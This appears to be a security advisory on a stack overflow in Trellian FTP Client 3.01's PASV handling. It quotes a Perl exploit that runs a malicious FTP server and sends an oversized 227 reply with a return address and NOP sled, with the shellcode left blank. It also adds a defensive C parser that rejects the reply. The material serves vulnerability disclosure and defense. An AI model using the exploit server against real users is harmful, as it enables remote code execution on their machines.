Affected Versions:
Trellian FTP Client 3.01

Vulnerability description:
Trellian FTP is a common FTP client.
The Trellian FTP client has a stack overflow vulnerability in its handling of FTP responses. If a user is tricked into connecting to a malicious FTP server and receives an overly long PASV response, the overflow can be triggered, resulting in arbitrary code execution on the user's machine.
<* Reference
http://secunia.com/advisories/39370/
*>
Test method:
The program (method) provided on this site may be offensive and is intended only for security research and teaching. Use it at your own risk!
# Exploit Title: Trellian FTP Client pasv bof exploit
# Date: 2010-04-11
# Author: zombiefx
# Software Link: http://www.trellian.com/bin/lu/dl/TrellianFTP.exe
# Version: Trellian ftpclient v 3.01
# Tested on: Windows XP SP3
# Usage: ./ftpserver.pl
# Acts as a fake ftp server that passes the vulnerable PASV command when a client connects.
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;

# Listen on the FTP control port and wait for a client to connect.
my $ftpsock =
  IO::Socket::INET->new( LocalPort => 21, Proto => 'tcp', Listen => 1 )
  or die "Socket Not Created $!\n";
print "#############################################################\n"
  . "# Trellian FTP Client pasv bof exploit #\n"
  . "# Author: zombiefx #\n"
  . "# Greetz to: corelanc0d3r/Dino Dai Zovi #\n"
  . "# http://pentest.cryptocity.net/exploitation #\n"
  . "# http://www.corelan.be:8800 #\n"
  . "#############################################################\n";
my $junk   = "\x41" x 200;               # 200 bytes of filler
my $jmpesp = pack( 'V', 0x7E429353 );    # oops (packed as a 32-bit little-endian value)
my $nops   = "\x90" x 50;
my $calcshell = "";    # encoded payload bytes not reproduced here
while ( my $data = $ftpsock->accept() ) {
    print "Client Connected!\nAwaiting Ftp commands:\n";
    print $data "220 Welcome ;)!\r\n";
    while (<$data>) {
        print;    # log each command the client sends
        print $data "331 Anonymous access allowed, send e-mail as password.\r\n" if (/USER/i);
        print $data "230-Welcome to the edevil server\r\n230 User logged in.\r\n" if (/PASS/i);
        print $data "257 \"/\" is current directory.\r\n" if (/PWD/gis);
        # The oversized 227 reply is the response that triggers the overflow in the client.
        print $data "227 Entering Passive Mode (" . $junk . $jmpesp . $nops . $calcshell . ").\r\n" if (/PASV/i);
        print $data "150 Here comes the directory listing.\r\n226 Directory send OK.\r\n" if (/LIST/i);
    }
}
Security suggestions:
Vendor patch:
Trellian
--------
The vendor has not yet provided a patch or upgrade. Users of the software should watch the vendor's homepage for the latest version:
http://www.trellian.com/index.html
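
A bounded parser for the 227 reply, showing the client-side checks that reject the overlong PASV response described above. This is an added example, not Trellian's code and not part of the original advisory; the name `parse_pasv`, the 512-byte cap `FTP_MAX_REPLY` and the sample reply are assumptions, and only the common parenthesized reply form is accepted.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FTP_MAX_REPLY 512 /* assumed cap on one control-channel line */

/* Parse "227 ... (h1,h2,h3,h4,p1,p2)" into addr[4] and *port.
 * Returns 0 on success, -1 if the reply is overlong or malformed.
 * Nothing from the reply is copied into a fixed-size buffer. */
int parse_pasv(const char *reply, unsigned char addr[4], unsigned short *port)
{
    unsigned int field[6];
    const char *p;
    char *end;

    /* Reject lines with no terminator inside the cap before scanning. */
    if (memchr(reply, '\0', FTP_MAX_REPLY + 1) == NULL)
        return -1;
    if (strncmp(reply, "227 ", 4) != 0 || (p = strchr(reply, '(')) == NULL)
        return -1;
    p++;

    for (int i = 0; i < 6; i++) {
        if (!isdigit((unsigned char)*p))
            return -1;                    /* filler such as "AAAA..." */
        unsigned long v = strtoul(p, &end, 10);
        if (v > 255 || end - p > 3)
            return -1;                    /* each field is one octet */
        field[i] = (unsigned int)v;
        if (*end != (i < 5 ? ',' : ')'))
            return -1;                    /* exact separators only */
        p = end + 1;
    }
    for (int i = 0; i < 4; i++)
        addr[i] = (unsigned char)field[i];
    *port = (unsigned short)(field[4] * 256 + field[5]);
    return 0;
}

int main(void)
{
    /* Constructed sample reply, not captured traffic. */
    const char *ok = "227 Entering Passive Mode (192,168,1,10,19,137).\r\n";
    unsigned char a[4];
    unsigned short port;

    if (parse_pasv(ok, a, &port) == 0)
        printf("%u.%u.%u.%u:%u\n", a[0], a[1], a[2], a[3], port);
    return 0;
}
```

The length cap only helps if the code that reads the control connection also stops at `FTP_MAX_REPLY` bytes per line instead of reading into a fixed stack buffer.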